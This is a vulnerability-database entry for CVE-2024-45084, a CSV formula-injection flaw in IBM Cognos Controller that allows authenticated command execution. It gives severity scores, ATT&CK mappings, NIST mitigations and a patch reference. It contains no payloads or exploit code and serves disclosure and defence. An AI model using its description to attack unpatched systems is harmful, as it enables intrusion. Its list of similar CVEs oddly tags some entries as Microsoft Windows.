Cyber Resilience

CVE-2024-45084

High

Published: 19 February 2025

Published
19 February 2025
Modified
29 September 2025
KEV Added
Patch
CVSS Score v3.1 8.0 CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
EPSS Score 0.0026 49.6th percentile
Risk Priority 16 60% EPSS · 20% KEV · 20% CVSS

Summary

CVE-2024-45084 is a high-severity Improper Neutralization of Formula Elements in a CSV File (CWE-1236) vulnerability in Ibm Cognos Controller. Its CVSS base score is 8.0 (High).

Operationally, exploitation aligns with the MITRE ATT&CK technique Exploit Public-Facing Application (T1190); ranked at the 49.6th percentile by exploit likelihood (below the median); it is not currently listed in the CISA KEV catalog.

The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-2 (Flaw Remediation).

Deeper analysis

CVE-2024-45084 is a formula injection vulnerability in IBM Cognos Controller versions 11.0.0 through 11.0.1 FP3 and IBM Controller 11.1.0. The flaw stems from improper validation of file contents, enabling an authenticated attacker to inject malicious formulas that lead to arbitrary command execution on the affected system. It has a CVSS v3.1 base score of 8.0 (AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H) and is associated with CWE-1236.

An authenticated attacker with low privileges (PR:L) can exploit this vulnerability over the network (AV:N) with low complexity (AC:L), though it requires user interaction (UI:R). Successful exploitation allows the attacker to achieve high impacts on confidentiality, integrity, and availability (C:I:A:H), including executing arbitrary commands on the underlying system.

IBM's security advisory at https://www.ibm.com/support/pages/node/7183597 provides details on mitigation, including available patches for the affected versions. Security practitioners should apply these updates promptly and review access controls for file upload functionalities in these products.

EU & UK References

Vulnerability details

IBM Cognos Controller 11.0.0 through 11.0.1 FP3 and IBM Controller 11.1.0 could allow an authenticated attacker to conduct formula injection. An attacker could execute arbitrary commands on the system, caused by improper validation of file contents.

CWE(s)

Related Threats

MITRE ATT&CK Enterprise TechniquesAI

T1190 Exploit Public-Facing Application Initial Access
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.
T1204.002 Malicious File Execution
An adversary may rely upon a user opening a malicious file in order to gain execution.
Why these techniques?

Formula injection in a public-facing web app (Cognos Controller) allows an authenticated attacker to craft malicious files that execute arbitrary commands upon opening/processing, directly enabling T1190 (exploit of the exposed application) and T1204.002 (user execution of malicious file).

Confidence: HIGH · MITRE ATT&CK Enterprise v18.1

CVEs Like This One

CVE-2024-40702Same product: Ibm Cognos Controller
CVE-2024-28777Same product: Ibm Cognos Controller
CVE-2024-52902Same product: Ibm Cognos Controller
CVE-2023-47160Same product: Ibm Cognos Controller
CVE-2026-35157Shared CWE-1236
CVE-2025-55745Shared CWE-1236
CVE-2020-36962Shared CWE-1236
CVE-2024-41763Same product: Microsoft Windows
CVE-2024-41767Same product: Microsoft Windows
CVE-2026-8855Same product: Microsoft Windows

Affected Assets

ibm
cognos controller
11.0.0 — 11.0.1.4
ibm
controller
11.1.0

Mitigating Controls

Mitigating Controls (NIST 800-53 r5) AI

prevent

Directly addresses the improper validation of file contents that enables authenticated attackers to inject malicious formulas leading to arbitrary command execution.

prevent

Mitigates the vulnerability by requiring timely remediation of flaws, including application of vendor patches as specified in IBM's security advisory.

prevent

Enforces restrictions on file types and structures processed by the system, limiting opportunities for formula injection via unauthorized input formats.

References